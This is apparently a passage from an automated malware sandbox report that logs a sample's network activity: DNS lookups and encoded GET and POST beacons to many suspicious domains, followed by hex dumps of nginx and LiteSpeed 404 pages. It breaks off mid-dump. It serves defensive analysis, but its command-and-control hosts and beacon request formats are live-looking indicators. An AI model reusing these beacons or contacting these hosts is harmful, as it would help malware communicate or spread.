                     Accept-Language: en-US,en;q=0.5
                     Connection: close
                     User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                 Source: global traffic | HTTP traffic detected:
                     GET /mv7p/?QbUPL=5Xkb80UCbQYKeySJYU53mvY68yMkCwQR8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOHKQPM7koR8LGBXKy+yJDj5RRAPqEofhY8WnntYYNfZxpGMdCDiinSrfj&ef4=TJYXELnhFJhl HTTP/1.1
                     Host: www.rtpterbaruwaktu3.xyz
                     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                     Accept-Language: en-US,en;q=0.5
                     Connection: close
                     User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                 Source: global traffic | HTTP traffic detected:
                     GET /cm9a/?ef4=TJYXELnhFJhl&QbUPL=AvN42DnS9Qw3kn1Ry3KvTJdIGYrzP5U8wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvrBPGjvGvWTn9eE6YM8B8FSoiTH7Br/Ez7MnCgATlHy+hFK5SJ9epG9Mk HTTP/1.1
                     Host: www.prhmcjdz.tokyo
                     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                     Accept-Language: en-US,en;q=0.5
                     Connection: close
                     User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                 Source: global traffic | HTTP traffic detected:
                     GET /6urf/?QbUPL=l+g0G83zvX30P9FhHqUPiCMCp3kC0CiGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR7eoy7wVxfJ9K+U+MKKjLOsgjwrfTYLmZqfPCjIDk3pY25vWCr1O4NF+r&ef4=TJYXELnhFJhl HTTP/1.1
                     Host: www.connecty.live
                     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                     Accept-Language: en-US,en;q=0.5
                     Connection: close
                     User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                 Source: global traffic | HTTP traffic detected:
                     GET /cpgr/?QbUPL=yUPZw4O96lKRgUDiLQ4YjgWex0ZVjKNUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjEi3gnykaux6zendXb1ybL2/XUTdEdLrQYsm3xUWbOyfaUl/C4vMGWlHL&ef4=TJYXELnhFJhl HTTP/1.1
                     Host: www.tals.xyz
                     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                     Accept-Language: en-US,en;q=0.5
                     Connection: close
                     User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                 Source: global traffic | HTTP traffic detected:
                     GET /u9hy/?QbUPL=WqQro+xdjTeJIlGzWne5GtaANfF9lgg49rKxVxpmjgGfbhgcY6AAEIO8u8GwbvTJPVNB3UOdkxCDRvWF6atxJpdnDAzWn2dcKGou59R0p8ISVdotXCTwv0fS6r3BHVImiCcwST7dAbkv&ef4=TJYXELnhFJhl HTTP/1.1
                     Host: www.50food.com
                     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                     Accept-Language: en-US,en;q=0.5
                     Connection: close
                     User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                 Source: global traffic | DNS traffic detected: DNS query: www.grandesofertas.fun
                 Source: global traffic | DNS traffic detected: DNS query: www.jijievo.site
                 Source: global traffic | DNS traffic detected: DNS query: www.ytsd88.top
                 Source: global traffic | DNS traffic detected: DNS query: www.bpgroup.site
                 Source: global traffic | DNS traffic detected: DNS query: www.fortevision.xyz
                 Source: global traffic | DNS traffic detected: DNS query: www.rtpterbaruwaktu3.xyz
                 Source: global traffic | DNS traffic detected: DNS query: www.prhmcjdz.tokyo
                 Source: global traffic | DNS traffic detected: DNS query: www.connecty.live
                 Source: global traffic | DNS traffic detected: DNS query: www.tals.xyz
                 Source: global traffic | DNS traffic detected: DNS query: www.50food.com
                 Source: global traffic | DNS traffic detected: DNS query: www.zriaraem-skiry.sbs
                 Source: unknown | HTTP traffic detected:
                     POST /8qt7/ HTTP/1.1
                     Host: www.ytsd88.top
                     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                     Accept-Language: en-US,en;q=0.5
                     Accept-Encoding: gzip, deflate
                     Origin: http://www.ytsd88.top
                     Referer: http://www.ytsd88.top/8qt7/
                     Content-Type: application/x-www-form-urlencoded
                     Connection: close
                     Cache-Control: no-cache
                     Content-Length: 218
                     User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                     Data Raw: 51 62 55 50 4c 3d 49 72 71 4f 51 36 78 65 37 33 49 49 6a 4a 35 47 4f 77 79 67 74 72 66 53 59 47 51 6e 2f 72 46 61 4c 37 6b 71 6b 68 42 71 63 5a 36 43 39 62 31 44 65 59 45 6d 4b 44 66 52 75 79 63 32 57 77 45 67 76 37 46 6b 65 39 6b 5a 4a 6f 75 62 4c 47 5a 69 7a 6d 30 51 6a 4c 64 68 58 58 55 33 4e 49 62 45 51 53 47 51 6b 46 5a 66 61 55 34 66 6d 45 66 64 4d 58 49 6b 4a 53 50 42 5a 41 6b 42 56 4a 2b 4a 44 6e 4f 32 2b 4e 49 67 64 79 37 47 4c 4e 5a 46 54 74 4f 6a 2b 73 39 72 51 48 57 51 6e 42 36 66 66 2b 43 65 42 58 6a 46 53 71 6e 63 35 65 37 70 42 78 44 30 66 5a 39 74 78 51 70 77 72 4b 66 55 43 4b 2f 38 47 30 70 66 61 50 43 77 70 48 59 70 62 67 3d 3d
                     Data Ascii: QbUPL=IrqOQ6xe73IIjJ5GOwygtrfSYGQn/rFaL7kqkhBqcZ6C9b1DeYEmKDfRuyc2WwEgv7Fke9kZJoubLGZizm0QjLdhXXU3NIbEQSGQkFZfaU4fmEfdMXIkJSPBZAkBVJ+JDnO2+NIgdy7GLNZFTtOj+s9rQHWQnB6ff+CeBXjFSqnc5e7pBxD0fZ9txQpwrKfUCK/8G0pfaPCwpHYpbg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 07:16:59 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 07:17:01 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 07:17:04 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 07:17:07 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 07:17:13 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 
61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 07:17:16 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 
61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 07:17:18 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 
61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 